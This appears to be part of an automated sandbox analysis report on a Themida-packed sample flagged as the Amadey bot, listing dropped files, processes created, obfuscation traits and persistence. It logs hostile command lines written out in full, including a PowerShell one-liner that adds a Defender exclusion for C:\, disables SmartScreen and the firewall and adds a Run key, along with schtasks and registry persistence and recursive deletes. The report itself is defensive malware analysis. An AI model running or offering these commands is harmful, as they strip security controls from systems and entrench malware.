      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /FJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Users\user\AppData\Local\Temp\vms\vms.exe "C:\Users\user\AppData\Local\Temp\vms\vms.exe" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile created: C:\Users\user\AppData\Local\Temp\vms.exeJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:800:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3076:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeMutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2604:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5892:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4204:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_01
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadlineHistoryFile_169209511
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\ProgramData\MicrosoftNetwork\System.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\ProgramData\MicrosoftNetwork\System.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: We7WnoqeXe.exeStatic file information: File size 3075288 > 1048576
      Source: We7WnoqeXe.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x26da00
      Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: vms.exe, rnyuf.exe, rnyuf.exe, 00000030.00000002.462751462.0000000000CA7000.00000040.00020000.sdmp, vms.exe, 0000004A.00000002.495089954.0000000000037000.00000040.00020000.sdmp
      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: We7WnoqeXe.exe, 00000001.00000002.378299642.0000000000AE0000.00000040.00020000.sdmp
      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: slhost.exe, 0000000F.00000002.566781551.00007FF7DD0A0000.00000040.00020000.sdmp, System.exe, 00000021.00000002.567725771.00007FF7CE770000.00000040.00020000.sdmp
      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: slhost.exe, System.exe

      Data Obfuscation:

      barindex
      Detected unpacking (changes PE section rights)Show sources
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeUnpacked PE file: 1.2.We7WnoqeXe.exe.a50000.0.unpack :ER; :R; :R;.idata:W;`~\1:R;.themida:EW;.boot:ER;`~\1:ER;`~\1:ER;.rsrc:R; vs :ER; :R; :R;
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00E5F8FA push 586688D8h; mov dword ptr [esp], edi19_2_0105B7BF
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00E5F8FA push 5CA4B116h; mov dword ptr [esp], edi19_2_0106E6F0
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00D3C0FF push 459E1CC1h; mov dword ptr [esp], ecx19_2_0107574B
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00D3C0FF push 5AB22FB3h; mov dword ptr [esp], ebp19_2_0108D37B
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00DCE8E9 push 0FED8390h; mov dword ptr [esp], edx19_2_0105339F
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00E5A4D0 push 55DF7D7Ch; mov dword ptr [esp], ecx19_2_01059096
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CE44AB push 63ED018Dh; mov dword ptr [esp], esi19_2_0105F602
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00DE685E push 573E68C4h; mov dword ptr [esp], edx19_2_01054337
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00DE685E push eax; mov dword ptr [esp], 646A3C58h19_2_0105BB51
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CE4442 push 7B762680h; mov dword ptr [esp], eax19_2_010544FC
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00D09C77 push edx; mov dword ptr [esp], eax19_2_01045D34
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00D3207A push eax; mov dword ptr [esp], ebp19_2_0109CEEC
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00D3207A push edx; mov dword ptr [esp], 1F8931A1h19_2_0109D65D
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00D3207A push edi; mov dword ptr [esp], 19BC4D6Ah19_2_0109FCF1
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00EA3C40 push eax; mov dword ptr [esp], esi19_2_01053D13
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00E6F858 push 3135161Dh; mov dword ptr [esp], edx19_2_010696EA
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00D0981A push 12D4DB1Fh; mov dword ptr [esp], edx19_2_0106B1EE
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00D09806 push edx; mov dword ptr [esp], ebp19_2_01056985
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00DD0805 push 43EB2EC7h; mov dword ptr [esp], ecx19_2_010968C0
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CC0423 push eax; mov dword ptr [esp], edx19_2_010779AC
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CC0423 push 62881BA3h; mov dword ptr [esp], ecx19_2_0109E0EE
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00E52015 push ebx; mov dword ptr [esp], eax19_2_0109E53B
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00DBA027 push eax; mov dword ptr [esp], esi19_2_0104C287
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00DBA027 push edi; mov dword ptr [esp], esp19_2_0104C28B
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00D6F1DF push 0410EE7Fh; mov dword ptr [esp], ebx19_2_0109E496
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CBC9F7 push eax; mov dword ptr [esp], ecx19_2_010A1FB6
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CF4D81 push 61FC5E49h; mov dword ptr [esp], eax19_2_010959AC
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00E6F58C push ebp; mov dword ptr [esp], ebx19_2_0106B7AB
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CDB94E push ecx; mov dword ptr [esp], ebx19_2_0109B5E8
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00D8595C push ebp; mov dword ptr [esp], ecx19_2_01045256
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00DD316B push eax; mov dword ptr [esp], esi19_2_0109F29D
      Source: We7WnoqeXe.exeStatic PE information: 0x9F1DE197 [Wed Aug 5 09:40:39 2054 UTC]
      Source: We7WnoqeXe.exeStatic PE information: section name:
      Source: We7WnoqeXe.exeStatic PE information: section name:
      Source: We7WnoqeXe.exeStatic PE information: section name:
      Source: We7WnoqeXe.exeStatic PE information: section name: `~\1
      Source: We7WnoqeXe.exeStatic PE information: section name: .themida
      Source: We7WnoqeXe.exeStatic PE information: section name: .boot
      Source: We7WnoqeXe.exeStatic PE information: section name: `~\1
      Source: We7WnoqeXe.exeStatic PE information: section name: `~\1
      Source: vms.exe.1.drStatic PE information: section name:
      Source: vms.exe.1.drStatic PE information: section name:
      Source: vms.exe.1.drStatic PE information: section name:
      Source: vms.exe.1.drStatic PE information: section name:
      Source: vms.exe.1.drStatic PE information: section name:
      Source: vms.exe.1.drStatic PE information: section name: .imports
      Source: vms.exe.1.drStatic PE information: section name: .themida
      Source: vms.exe.1.drStatic PE information: section name: .boot
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name: .imports
      Source: slhost.exe.1.drStatic PE information: section name: .themida
      Source: slhost.exe.1.drStatic PE information: section name: .boot
      Source: rnyuf.exe.14.drStatic PE information: section name:
      Source: rnyuf.exe.14.drStatic PE information: section name:
      Source: rnyuf.exe.14.drStatic PE information: section name:
      Source: rnyuf.exe.14.drStatic PE information: section name:
      Source: rnyuf.exe.14.drStatic PE information: section name:
      Source: rnyuf.exe.14.drStatic PE information: section name: .imports
      Source: rnyuf.exe.14.drStatic PE information: section name: .themida
      Source: rnyuf.exe.14.drStatic PE information: section name: .boot
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name: .imports
      Source: System.exe.15.drStatic PE information: section name: .themida
      Source: System.exe.15.drStatic PE information: section name: .boot
      Source: vms[1].exe0.19.drStatic PE information: section name:
      Source: vms[1].exe0.19.drStatic PE information: section name:
      Source: vms[1].exe0.19.drStatic PE information: section name:
      Source: vms[1].exe0.19.drStatic PE information: section name:
      Source: vms[1].exe0.19.drStatic PE information: section name:
      Source: vms[1].exe0.19.drStatic PE information: section name: .imports
      Source: vms[1].exe0.19.drStatic PE information: section name: .themida
      Source: vms[1].exe0.19.drStatic PE information: section name: .boot
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name: .imports
      Source: slhost[1].exe0.19.drStatic PE information: section name: .themida
      Source: slhost[1].exe0.19.drStatic PE information: section name: .boot
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name: .imports
      Source: slhost.exe.19.drStatic PE information: section name: .themida
      Source: slhost.exe.19.drStatic PE information: section name: .boot
      Source: vms.exe.19.drStatic PE information: section name:
      Source: vms.exe.19.drStatic PE information: section name:
      Source: vms.exe.19.drStatic PE information: section name:
      Source: vms.exe.19.drStatic PE information: section name:
      Source: vms.exe.19.drStatic PE information: section name:
      Source: vms.exe.19.drStatic PE information: section name: .imports
      Source: vms.exe.19.drStatic PE information: section name: .themida
      Source: vms.exe.19.drStatic PE information: section name: .boot
      Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
      Source: initial sampleStatic PE information: section name: entropy: 7.98525936352
      Source: initial sampleStatic PE information: section name: `~\1 entropy: 7.37488976272
      Source: initial sampleStatic PE information: section name: `~\1 entropy: 7.37990484138
      Source: initial sampleStatic PE information: section name: entropy: 7.97588681512
      Source: initial sampleStatic PE information: section name: entropy: 7.98019004497
      Source: initial sampleStatic PE information: section name: entropy: 7.97588681512
      Source: initial sampleStatic PE information: section name: entropy: 7.98019004497
      Source: initial sampleStatic PE information: section name: entropy: 7.97940314248
      Source: initial sampleStatic PE information: section name: entropy: 7.98019004497
      Source: initial sampleStatic PE information: section name: entropy: 7.98019004497
      Source: initial sampleStatic PE information: section name: entropy: 7.97940314248

      Persistence and Installation Behavior:

      barindex
      Yara detected Amadey botShow sources
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: Yara matchFile source: 00000013.00000002.567557451.000000000167A000.00000004.00000020.sdmp, type: MEMORY
      Creates files in the system32 config directoryShow sources
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile created: C:\ProgramData\MicrosoftNetwork\System.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile created: C:\ProgramData\UpSys.exeJump to dropped file
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile created: C:\Users\user\AppData\Local\Temp\slhost.exeJump to dropped file
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile created: C:\Users\user\AppData\Local\Temp\vms.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\vms[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile created: C:\ProgramData\MicrosoftNetwork\System.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile created: C:\Users\user\AppData\Local\Temp\slhost\slhost.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile created: C:\Users\user\AppData\Local\Temp\vms\vms.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\UpSys[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\slhost[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\vms.exeFile created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile created: C:\ProgramData\UpSys.exeJump to dropped file

      Boot Survival:

      barindex
      Creates multiple autostart registry keysShow sources
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vms.exeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinNet
      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
      Creates an undocumented autostart registry key Show sources
      Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnkJump to behavior
